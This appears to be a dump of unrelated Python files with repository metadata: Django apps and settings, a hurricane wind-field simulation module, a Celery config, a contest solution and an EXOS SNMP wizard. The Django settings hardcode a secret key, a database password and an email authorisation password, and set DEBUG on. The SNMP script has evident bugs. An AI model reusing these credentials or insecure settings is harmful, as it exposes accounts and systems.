7b45ab15120fc12e379631a88aafbb6bba143f47
|
23ef5cb5eed3b2768c8e26208eeb0b8922c743bf
|
/dossier/models/__init__.py
|
9492dae9aeb53ab1a4aefe837408c830de986c5d
|
[
"MIT"
] |
permissive
|
anukat2015/dossier.models
|
3c66396dd09e6f5a618b199d674340e23769c342
|
c9e282f690eab72963926329efe1600709e48b13
|
refs/heads/master
| 2021-01-21T10:45:33.881681
| 2015-10-08T18:38:35
| 2015-10-08T18:38:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 706
|
py
|
'''
.. This software is released under an MIT/X11 open source license.
Copyright 2012-2014 Diffeo, Inc.
``dossier.models`` provides search engines and a :mod:`dossier.web`
application for working with active learning.
.. automodule:: dossier.models.web.run
.. automodule:: dossier.models.pairwise
.. automodule:: dossier.models.features
.. automodule:: dossier.models.etl
.. automodule:: dossier.models.dragnet
.. automodule:: dossier.models.soft_selectors
.. automodule:: dossier.models.linker
'''
from dossier.models import features
from dossier.models.pairwise import PairwiseFeatureLearner, similar, dissimilar
__all__ = [
'PairwiseFeatureLearner', 'similar', 'dissimilar',
'features',
]
|
[
"andrew@diffeo.com"
] |
andrew@diffeo.com
|
b82d9de712eba7a44376cc047eef206300213664
|
87ba02d5ebf91cbc0fadd50ca44196177b3c86b7
|
/modules/performRegionalEventSimulation/regionalWindField/ComputeIntensityMeasure.py
|
bfd018d5c1b3bef55b8a59205c29082604f7389b
|
[] |
no_license
|
joannajzou/SimCenterBackendApplications
|
4cd6ff9ec856ab634bbf97ff4e67a336cacfba5b
|
5f040fcbe0b7a2080918ce3f7f07ca6e2ae51b16
|
refs/heads/master
| 2021-06-23T18:19:04.498654
| 2021-03-17T13:41:08
| 2021-03-17T13:41:08
| 202,189,745
| 0
| 0
| null | 2021-03-17T13:41:09
| 2019-08-13T17:07:43
|
Python
|
UTF-8
|
Python
| false
| false
| 15,936
|
py
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2018 Leland Stanford Junior University
# Copyright (c) 2018 The Regents of the University of California
#
# This file is part of the SimCenter Backend Applications
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# You should have received a copy of the BSD 3-Clause License along with
# this file. If not, see <http://www.opensource.org/licenses/>.
#
# Contributors:
# Kuanshi Zhong
#
import os
import subprocess
import sys
import json
import copy
import shutil
import multiprocessing as mp
import numpy as np
import pandas as pd
from WindFieldSimulation import *
def run_model(scen, p, t, path_perturb, feat_perturb, res_mp):
model = LinearAnalyticalModel_SnaikiWu_2017(cyclone_param = p, storm_track = t)
if scen['Terrain']:
model.add_reference_terrain(scen['Terrain'])
model.set_cyclone_mesh(scen['StormMesh'])
model.set_measure_height(scen['MeasureHeight'])
model.define_track(scen['TrackSimu'])
model.add_stations(scen['StationList'])
delta_path = (np.random.rand(3) - 0.5) * path_perturb
delta_feat = np.array(p[3:6]) + (np.random.rand(3) - 0.5) * feat_perturb
# this just an engineering judgement that the pressure difference, moving speed, and max-wind-speed radius
# should not be less than 0.0 in the value.
delta_feat[delta_feat < 0.0] = 0.0
print('dLatitude, dLongtitude, dAngle = ', delta_path)
print('dP, v, Rmax = ', delta_feat)
model.set_delta_path(delta_path)
model.set_delta_feat(delta_feat)
model.compute_wind_field()
res_mp.append(model.get_station_data())
def simulate_storm(scenarios, event_info, model_type):
if (model_type == 'LinearAnalytical'):
num_per_site = event_info['NumberPerSite']
if (num_per_site == 1):
path_perturb = np.zeros(3)
feat_perturb = np.zeros(3)
else:
if (len(event_info.get('Perturbation', [])) != 6):
print('ComputeIntensityMeasure: Perturbation should have a size of 6.')
path_perturb = np.array([0.5, 0.5, 90.0])
feat_perturb = np.array([10.0, 10.0, 10.0])
print('ComputeIntensityMeasure: [1.0, 1.0, 90.0, 10.0, 10.0, 10.0] is used for perturbations.')
else:
path_perturb = np.array(event_info['Perturbation'][0:3])
feat_perturb = np.array(event_info['Perturbation'][3:6])
for i in range(len(scenarios)):
if (i == 1):
print('ComputeIntensityMeasure: currently supporting single scenario simulation only.')
return -1
cur_scen = scenarios[i]
param = cur_scen['CycloneParam']
track = cur_scen['StormTrack']
np.random.seed(100)
# parallel
with mp.Manager() as manager:
res_mp = manager.list([])
proc_list = []
for k in range(num_per_site):
proc = mp.Process(target = run_model,
args = (cur_scen, param, track, path_perturb, feat_perturb, res_mp))
proc_list.append(proc)
for k in range(num_per_site):
proc = proc_list[k]
proc.start()
for k in range(num_per_site):
proc = proc_list[k]
proc.join()
# extract data
res = [x for x in res_mp]
else:
print('ComputeIntensityMeasure: currently only supporting LinearAnalytical model')
# return
return res
def simulate_storm_cpp(site_info, scenario_info, event_info, model_type, dir_info):
if (model_type == 'LinearAnalytical'):
# save configuration file
input_dir = dir_info['Input']
output_dir = dir_info['Output']
config = {
"Scenario": scenario_info,
"Event": event_info
}
abs_path_config = os.path.abspath(os.path.join(input_dir, 'SimuConfig.json'))
with open (abs_path_config, "w") as f:
json.dump(config, f)
# site file
abs_path_site = os.path.abspath(os.path.join(input_dir, site_info['input_file']))
# track file
abs_path_track = os.path.abspath(os.path.join(input_dir, scenario_info['Storm']['Track']))
# lat_w file
abs_path_latw = os.path.abspath(os.path.join(input_dir, scenario_info['Storm']['TrackSimu']))
# terrain file
if ('Terrain' in scenario_info.keys()):
abs_path_terrain = os.path.abspath(os.path.join(input_dir, scenario_info['Terrain']))
else:
# default terrain z0 = 0.01 everywhere for the defined domain
abs_path_terrain = os.path.abspath(os.path.join(input_dir, 'DefaultTerrain.geojson'))
dict_dt = {
"type": "FeatureCollection",
"features": [{
"type": "Feature",
"geometry": {
"type": "Polygon",
"coordinates": [
[-90.0, -180.0],
[90.0, -180.0],
[90.0, 180.0],
[-90.0, 180.0]]
},
"properties": {
"z0": 0.01
}
}
]
}
with open(abs_path_terrain, 'w') as f:
json.dump(dict_dt, f, indent=2)
# configuring perturbation
num_per_site = event_info['NumberPerSite']
if (num_per_site == 1):
path_perturb = np.zeros(3)
feat_perturb = np.zeros(3)
else:
if (len(event_info.get('Perturbation', [])) != 6):
print('ComputeIntensityMeasure: Perturbation should have a size of 6.')
path_perturb = np.array([0.5, 0.5, 90.0])
feat_perturb = np.array([10.0, 10.0, 10.0])
print('ComputeIntensityMeasure: [1.0, 1.0, 90.0, 10.0, 10.0, 10.0] is used for perturbations.')
else:
path_perturb = np.array(event_info['Perturbation'][0:3])
feat_perturb = np.array(event_info['Perturbation'][3:6])
for i in range(int(scenario_info['Number'])):
if (i == 1):
print('ComputeIntensityMeasure: currently supporting single scenario simulation only.')
return -1
np.random.seed(100)
res = []
# parallel
pert_list = []
args_list = []
odir_list = []
if sys.platform.startswith('win'):
windsimu_bin = os.path.dirname(__file__) + '/WindFieldSimulation.exe'
else:
windsimu_bin = os.path.dirname(__file__) + '/WindFieldSimulation'
## preparing files
for j in range(num_per_site):
delta_path = (np.random.rand(3) - 0.5) * path_perturb
delta_feat = (np.random.rand(3) - 0.5) * feat_perturb
pert_dict = {
"dLatitude": delta_path[0],
"dLongitude": delta_path[1],
"dAngle": delta_path[2],
"dP": delta_feat[0],
"dV": delta_feat[1],
"dR": delta_feat[2]
}
abs_path_pert = os.path.abspath(os.path.join(input_dir, 'Perturbation' + str(j) + '.json'))
with open(abs_path_pert, "w") as f:
json.dump(pert_dict, f)
print('dLatitude, dLongtitude, dAngle = ', delta_path)
print('dP, dv, dR = ', delta_feat)
output_subdir = os.path.abspath(os.path.join(output_dir, 'simu' + str(j)))
if os.path.exists(output_subdir):
shutil.rmtree(output_subdir)
os.makedirs(output_subdir)
args = [windsimu_bin, "--config", abs_path_config, "--site", abs_path_site,
"--track", abs_path_track, "--latw", abs_path_latw, "--pert", abs_path_pert,
"--terrain", abs_path_terrain, "--z0", output_subdir,
"--output", output_subdir]
pert_list.append(abs_path_pert)
args_list.append(args)
odir_list.append(output_subdir)
## running
procs_list = [subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE) for cmd in args_list]
for proc in procs_list:
proc.wait()
## loading output
for j in range(num_per_site):
os.remove(pert_list[j])
station_res = {
'Latitude': [],
'Longitude': [],
'z0': [],
'PWS': {
'height': [],
'duration': 600.0,
'windspeed': []
}
}
df = pd.read_csv(os.path.join(os.path.abspath(odir_list[j]), 'StationZ0.csv'), header = None, index_col = None)
station_res['z0'] = list(np.concatenate(df.values.tolist()).flat)
df = pd.read_csv(os.path.join(os.path.abspath(odir_list[j]), 'MeasureHeight.csv'), header = None, index_col = None)
station_res['PWS']['height'] = df.values.tolist()[0]
df = pd.read_csv(os.path.join(os.path.abspath(odir_list[j]), 'MaxWindSpeed.csv'), header = None, index_col = None)
station_res['PWS']['windspeed'] = df.values.tolist()
res.append(station_res)
shutil.rmtree(odir_list[j])
# house-keeping
os.remove(abs_path_config)
else:
print('ComputeIntensityMeasure: currently only supporting LinearAnalytical model')
# return
return res
def convert_wind_speed(event_info, simu_res):
print('ComputeIntensityMeasure: converting peak wind speed to specificed exposure, measuring height, and gust duration.')
if ('HAZUS' in event_info['IntensityMeasure']['Type']):
# Exposure type C: z0 = 0.03
exposure = 'C'
# 10-m measuring height
reference_height = 10.0
# 3-s gust duration
gust_duration = 3.0
else:
exposure = event_info['IntensityMeasure']['Exposure']
if exposure not in ['A', 'B', 'C', 'D']:
print('ComputeIntensityMeasure: the Exposure should be A, B, C, or D.')
return -1
gust_duration = event_info['IntensityMeasure']['GustDuration']
reference_height = event_info['IntensityMeasure']['ReferenceHeight']
pws_mr = []
for i in range(len(simu_res)):
cur_res = simu_res[i]
# Reading simulation heights
measure_height = cur_res['PWS']['height']
# Reading simulated wind speed
pws_raw = np.array(cur_res['PWS']['windspeed'])
# Reading z0 in the simulation
z0_simu = np.array(cur_res['z0'])
# Reading gust duration in the simulation
gust_duration_simu = cur_res['PWS']['duration']
# quick check the size
if pws_raw.shape[1] != len(measure_height):
print('ComputeIntensityMeasure: please check the output wind speed results.')
return -1
# ASCE 7-16 conversion (Chapter C26)
# station-wise empirical exponent \alpha
alpha = 5.65 * (z0_simu ** (-0.133))
# station-wise gradient height
zg = 450.0 * (z0_simu ** 0.125)
# target exposure alpha and graident height
if (exposure == 'B'):
alpha_t = 7.0
zg_t = 365.76
elif (exposure == 'D'):
alpha_t = 11.5
zg_t = 213.36
else:
# 'C'
alpha_t = 9.5
zg_t = 274.32
# conversion
pws_raw = interp_wind_by_height(pws_raw, measure_height, reference_height)
print(np.max(pws_raw))
# computing gradient-height wind speed
pws_tmp = pws_raw * (zg / reference_height) ** (1.0 / alpha)
# converting exposure
pws_tmp = pws_tmp * (reference_height / zg_t) ** (1.0 / alpha_t)
pws = pws_tmp * gust_factor_ESDU(gust_duration_simu, gust_duration)
print(np.max(pws))
# appending to pws_mr
pws_mr.append(pws)
print('ComputeIntensityMeasure: wind speed conversion completed.')
# return
return pws_mr
def interp_wind_by_height(pws_ip, height_simu, height_ref):
"""
interp_wind_by_height: interpolating the wind simulation results by the reference height
"""
num_stat = pws_ip.shape[0]
pws_op = np.zeros(num_stat)
for i in range(num_stat):
pws_op[i] = np.interp(height_ref, height_simu, pws_ip[i, :], left = pws_ip[i, 0], right = pws_ip[i, -1])
# return
return pws_op
def gust_factor_ESDU(gd_c, gd_t):
"""
gust_factor_ESDU: return a gust facto between gd_c and gd_t
"""
# gust duration (sec)
gd = [1.0, 2.0, 5.0, 10.0, 20.0,
50.0, 100.0, 200.0, 500.0, 1000.0,
2000.0, 3600.0]
# gust factor w.r.t. 3600 sec
gf = [1.59, 1.55, 1.47, 1.40, 1.32,
1.20, 1.15, 1.10, 1.055, 1.045,
1.02, 1.00]
# interpolation
gf_t = np.interp(gd_t, gd, gf, left = gf[0], right = gf[-1]) \
/ np.interp(gd_c, gd, gf, left = gf[0], right = gf[-1])
# return
return gf_t
def export_pws(stations, pws, output_dir, filename = 'EventGrid.csv'):
print('ComputeIntensityMeasure: saving results.')
# collecting site locations
lat = []
lon = []
for s in stations['Stations']:
lat.append(s['Latitude'])
lon.append(s['Longitude'])
# saving data
station_num = len(lat)
csv_file = [str(x + 1)+'.csv' for x in range(station_num)]
d = {
'Station': csv_file,
'Latitude': lat,
'Longitude': lon
}
df = pd.DataFrame.from_dict(d)
df.to_csv(os.path.join(output_dir, filename), index = False)
for i in range(station_num):
pws_op = [pws[0][i]]
if len(pws) > 1:
for j in range(len(pws) - 1):
pws_op.append(pws[j + 1][i])
d = {
'PWS': pws_op
}
df = pd.DataFrame.from_dict(d)
df.to_csv(os.path.join(output_dir, csv_file[i]), index = False)
print('ComputeIntensityMeasure: simulated wind speed field saved.')
|
[
"kuanshi@stanford.edu"
] |
kuanshi@stanford.edu
|
a99f13ede01d669f9d08ea0b81d5060a90e06750
|
686a962bc2c9527e0fb63f6f9bc659fcf3568bf6
|
/rest/models.py
|
9458344863e529089463a4c8c0509725b08f3559
|
[] |
no_license
|
mourasis/webservice
|
572c62608e53846f0160aae567da1595631202b1
|
3a7d67239a30e753bf89d09394f96442ccbfd1ad
|
refs/heads/master
| 2020-06-23T03:57:20.300943
| 2019-07-23T20:52:48
| 2019-07-23T20:52:48
| 198,503,495
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 236
|
py
|
from django.db import models
class Livro(models.Model):
titulo = models.CharField(max_length=200)
autor = models.CharField(max_length=200)
volume = models.IntegerField()
def __str__(self):
return self.titulo
|
[
"root@moura.local"
] |
root@moura.local
|
c564381b8a3786274c292ddc6a57ed24ad1e6895
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03681/s311284212.py
|
d8b25fb6e7dd6d5384882806daa8e1c440d5c178
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 298
|
py
|
n, m = map(int, input().split())
mod = 10 ** 9 + 7
if abs(n - m) >= 2:
print(0)
else:
res = 1
for i in range(1, n+1):
res = res * i % mod
for i in range(1, m+1):
res = res * i % mod
if abs(n - m) == 1:
print(res)
else:
print(res * 2 % mod)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
237eac4b7ec61fc9f01809d041c1a345f7a690ea
|
47cb331a4ad7eee2a352e65ea197f3d0dbce7bb4
|
/configuratie_visualisatie_firewalls_webapp/run.py
|
4f40948d8f8c12e01cc00a3ce7074deff728b884
|
[] |
no_license
|
Bakkerino/firewall_configuration_tool
|
d0694d5c9e44d7819b0f449c6ecb34bd34083395
|
0ea5326b36b4dca430f6fc00e68015e2a43855ba
|
refs/heads/master
| 2022-12-04T06:33:38.107245
| 2020-08-20T10:07:25
| 2020-08-20T10:07:25
| 261,829,028
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 86
|
py
|
from cvf import app
if __name__ == "__main__":
app.run(debug=app.config["DEBUG"])
|
[
"k.m.bakker@st.hanze.nl"
] |
k.m.bakker@st.hanze.nl
|
0ad8cf2793f9f48f35cd1dc144cabb7c55a3dbd8
|
28e06d5e6e31940d85777b5081aa8d1a7e61adc9
|
/Parking_Lot/Parking_Lot/celery.py
|
36a648b702d13ee62f3661dc71234819754ca882
|
[] |
no_license
|
saurav004/ParkingLot
|
24316a82ccb710e0145f86483c247e200d30bfbb
|
72ceb109f20060c7a8af15cb407e09db8598c858
|
refs/heads/master
| 2023-02-13T09:38:52.834470
| 2021-01-09T07:36:19
| 2021-01-09T07:36:19
| 323,919,157
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 719
|
py
|
from __future__ import absolute_import, unicode_literals
import os
from celery import Celery
# set the default Django settings module for the 'celery' program.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Parking_Lot.settings')
app = Celery('Parking_Lot')
# Using a string here means the worker doesn't have to serialize
# the configuration object to child processes.
# - namespace='CELERY' means all celery-related configuration keys
# should have a `CELERY_` prefix.
app.config_from_object('django.conf:settings', namespace='CELERY')
# Load task modules from all registered Django app configs.
app.autodiscover_tasks()
@app.task(bind=True)
def debug_task(self):
print(f'Request: {self.request!r}')
|
[
"logtosaurav@gmail.com"
] |
logtosaurav@gmail.com
|
dd0c5db76215bf755e43da64fa6e3ece88b1a20a
|
d17f6409d93f1ee84e14fe962ecc2782464ca551
|
/rango/admin.py
|
86ff6ace6614c0790724e50e2bf735ce76ecbe50
|
[] |
no_license
|
lewisponsonby/tango_with_django_project
|
4e55864954bc31f5dda5240ba8234e645781a08e
|
77ca3d91a8eb5bf1843b414e09210b02d369431a
|
refs/heads/main
| 2023-03-04T23:41:41.208674
| 2021-02-11T00:27:31
| 2021-02-11T00:27:31
| 329,949,922
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 391
|
py
|
from django.contrib import admin
from rango.models import Category, Page
from rango.models import UserProfile
class PageAdmin(admin.ModelAdmin):
list_display=("title","category","url")
class CategoryAdmin(admin.ModelAdmin):
prepopulated_fields = {"slug":("name",)}
admin.site.register(Category, CategoryAdmin)
admin.site.register(Page, PageAdmin)
admin.site.register(UserProfile)
|
[
"2464980P@student.gla.ac.uk"
] |
2464980P@student.gla.ac.uk
|
0a5af99dfde92508bd7713c364ddabefec4bc691
|
4bd4bec81c5dcf634b21902204b1d1da4fc49dc9
|
/Python/EXOS/snmpv1v2configpy/SNMPv1v2Config.py
|
960fead3dcdb9aecffeb1963c0862da24af1041e
|
[
"BSD-2-Clause"
] |
permissive
|
mhelmEXTR/ExtremeScripting
|
d7b2b095151bbd670f67140c01a6004b78e8388f
|
fd8554748dfb4b408965d9a3e1a977c6a86842e2
|
refs/heads/master
| 2021-07-07T17:27:07.330072
| 2021-04-29T16:43:32
| 2021-04-29T16:43:32
| 45,707,060
| 0
| 0
| null | 2015-11-06T20:55:50
| 2015-11-06T20:55:49
| null |
UTF-8
|
Python
| false
| false
| 3,293
|
py
|
#!/usr/bin/env python
'''
Wizard to configure SNMP
'''
#############################################################################
# SNMP v1/v2 Variable definitions
#############################################################################
#clierrormode = raw_input("If this script encounters errors, do you wish to abort or ignore?: ")
ynsnmpconfig = raw_input("Congifigure SNMP v1/v2 access? (yes or no): ")
ynsnmpdisable = raw_input("Disable SNMP v1/v2 access? (yes or no): ")
ynsnmpcommadd = raw_input("Add SNMP v1/v2 communities? (yes or no): ")
snmprwname = raw_input("Read/Write SNMP Community Name?: ")
snmproname = raw_input("Read-Only SNMP Community Name?: ")
ynsnmpcommrem = raw_input("Remove default SNMP Communities? (yes or no): ")
snmpname = raw_input("SNMP Switch Name?: ")
snmplocation = raw_input("SNMP Location?: ")
snmpcontact = raw_input("SNMP Contact?: ")
snmptrapcount = raw_input("Number of SNMP Trap Receivers (Script supports: 1-3): ")
snmptrap1 = raw_input("SNMP Trap Receiver #1: ")
snmptrap2 = raw_input("SNMP Trap Receiver #2: ")
snmptrap3 = raw_input("SNMP Trap Receiver #3: ")
#############################################################################
# SNMP V1/V2 Configuration
#############################################################################
#if (re.match(clierrormode,"ignore")):
# configure cli mode scripting ignore-error
# create log entry "CLI mode set for Ignore on Error"
#else
# configure cli mode scripting abort-on-error
# create log entry "CLI mode set for Abort on Error"
if (re.match(ynsnmpconfig,"yes")):
exsh.clicmd("create log entry \"Starting SNMP Configuration\"", True)
print("Starting SNMP Configuration")
exsh.clicmd("configure snmp sysName %s" % snmpname, True)
exsh.clicmd("configure snmp sysLocation %s" % snmplocation, True)
exsh.clicmd("configure snmp sysContact %s" % snmpcontact, True)
if (snmptrapcount >= 1):
exsh.clicmd("configure snmp add trapreceiver %s community %s" % (snmptrap1,snmproname), True)
if (snmptrapcount >= 2):
exsh.clicmd("configure snmp add trapreceiver %s community %s" % (snmptrap2,snmproname), True)
if (snmptrapcount >= 3):
exsh.clicmd("configure snmp add trapreceiver %s community %s" % (snmptrap3,snmproname), True)
if (re.match(ynsnmpcommadd,"yes")):
exsh.clicmd("configure snmp add community readwrite %s" % snmprwname, True)
exsh.clicmd("configure snmp add community readonly %s" % snmproname, True)
exsh.clicmd("create log entry \"New SNMP Communities Created\"", True)
print("New SNMP Communities Created")
if (re.match(ynsnmpcommrem,"yes")):
exsh.clicmd("configure snmp delete community readwrite private", True)
exsh.clicmd("configure snmp delete community readonly public", True)
exsh.clicmd("create log entry \"Default SNMP Communities Removed\"", True)
print("Default SNMP Communities Removed")
else:
exsh.clicmd("create log entry \"Default SNMP Communities NOT Removed\"", True)
print("Default SNMP Communities NOT Removed")
else:
if (re.match(ynsnmpdisable,"yes")):
exsh.clicmd("create log entry \"Disabling SNMP access\"", True)
print("Disabling SNMP access")
exsh.clicmd("disable snmp access snmp-v1v2", True)
else:
exsh.clicmd("create log entry \"SNMP Not Configured\"", True)
print("SNMP Not Configured")
|
[
"stewilliams@extremenetworks.com"
] |
stewilliams@extremenetworks.com
|
c44a19da41a435781f04041a1e7bd5b9d3219591
|
b11b38a667a69969d268634e2c3de9f1b624823b
|
/tren.py
|
c2915fce05587062083416208d30bb2aa4d2d6b6
|
[] |
no_license
|
minc84/learn
|
e68013e51fe846d0d41831e70cf3694154a152a8
|
22882b24b24ba386b0baf84055e08894c8a77053
|
refs/heads/master
| 2023-03-19T23:18:26.010374
| 2021-01-13T13:44:46
| 2021-01-13T13:44:46
| 278,613,516
| 0
| 0
| null | 2021-03-20T04:41:50
| 2020-07-10T11:10:07
|
Python
|
UTF-8
|
Python
| false
| false
| 441
|
py
|
import sqlite3 as sq
with sq.connect("saper.db") as con:
cur = con.cursor()
cur.execute(" select * from users where old > 20 AND score < 40 ORDER BY old DESC LIMIT 1")
res = cur.fetchall()
for value in cur.execute(" select name, score from users WHERE name LIKE 'ВАСИЛИСА'"):
print(value)
cur.execute("select name, score from users WHERE name LIKE 'ВАСИЛИСА' AND score > 1100")
res = cur.fetchone()
print(res)
|
[
"nesterovish@yandex.ru"
] |
nesterovish@yandex.ru
|
c4f671e9a75ffab245e4527cf3a74964ce8ebeb3
|
76b8e0895f81f021a3578ce9ac23d4b87cf5aeb4
|
/base/__init__.py
|
d7744914dda88bac878d220517b8d117b93f89a7
|
[] |
no_license
|
kilomeow/pick-a-bot
|
ec0d4934866fc7a9a7afd46053524da93574a78d
|
56566022b5ad5966a4183baf188e3ca259f2aba3
|
refs/heads/master
| 2023-04-07T14:00:28.270458
| 2021-04-19T06:56:57
| 2021-04-19T06:56:57
| 258,882,010
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 114
|
py
|
from .session import *
from .trigger import *
from .action import *
from .context import *
from .promise import *
|
[
"dest@disr.it"
] |
dest@disr.it
|
9107cd52b4f5cb29c06fa7c3b10e07dbb89fe3a2
|
e230e3c1d6935d36b7074390f096d782cabd75af
|
/dailyfresh/settings.py
|
520e1cbe63fe0018a6d3e7702bc98f883808c38e
|
[] |
no_license
|
PeterZhangxing/dailyfresh_ori
|
603e7e42457d27ffefb6a4601f9b6826a3a55a6f
|
19b6d667d6f49a528aeb6f4430e2537c933936f0
|
refs/heads/master
| 2020-12-02T01:41:32.160278
| 2019-12-30T04:24:50
| 2019-12-30T04:24:50
| 230,846,590
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,607
|
py
|
"""
Django settings for dailyfresh project.
Generated by 'django-admin startproject' using Django 2.0.4.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
import sys
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0,os.path.join(BASE_DIR,'apps'))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'h2)2bq3(3=-9a#8m$t-ci9t91o*tr%xs%@3g2^e-4^)i$(335l'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'tinymce', # 富文本编辑器
'haystack', # 注册全文检索框架
'user', # 用户模块
'goods', # 商品模块
'cart', # 购物车模块
'order', # 订单模块
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'dailyfresh.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'dailyfresh.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
# }
# }
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'dailyfresh',
'USER': 'zx2005',
'PASSWORD': 'redhat',
'HOST': '10.1.1.128',
'PORT':3306,
}
}
# 告诉django其自带的认证系统,使用哪个模型类
AUTH_USER_MODEL='user.User'
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'zh-hans' # 本地化
TIME_ZONE = 'Asia/Shanghai' # 本地化
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR,'static'),
]
# 富文本编辑器配置
TINYMCE_DEFAULT_CONFIG = {
'theme': 'advance',
'width': 600,
'height': 400,
}
# 发送邮件配置
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
# smpt服务地址
EMAIL_HOST = 'smtp.qq.com'
EMAIL_PORT = 25
# 发送邮件的邮箱
EMAIL_HOST_USER = '99360681@qq.com'
# 在邮箱中设置的客户端授权密码
EMAIL_HOST_PASSWORD = 'cdbnlajjhfctbjhb'
# 收件人看到的发件人
EMAIL_FROM = '天天吃屎<99360681@qq.com>'
# Django的缓存配置
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "redis://10.1.1.128:6379/9",
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient",
}
}
}
# 配置session存储在缓存中,就是上面的缓存
SESSION_ENGINE = "django.contrib.sessions.backends.cache"
SESSION_CACHE_ALIAS = "default"
# 配置django系统自带认证失败后,默认跳转的地址
LOGIN_URL='/user/login'
# 设置Django的文件存储类
DEFAULT_FILE_STORAGE='utils.fdfs.storage.FdfsStorage'
# 设置fdfs使用的client.conf文件路径
FDFS_CLIENT_CONF='./utils/fdfs/client.conf'
# 设置fdfs存储服务器上nginx的IP和端口号
FDFS_URL='http://10.1.1.128:8888/'
# 全文检索框架的配置
HAYSTACK_CONNECTIONS = {
'default': {
# 使用whoosh引擎
# 'ENGINE': 'haystack.backends.whoosh_backend.WhooshEngine',
'ENGINE': 'haystack.backends.whoosh_cn_backend.WhooshEngine',
# 索引文件路径
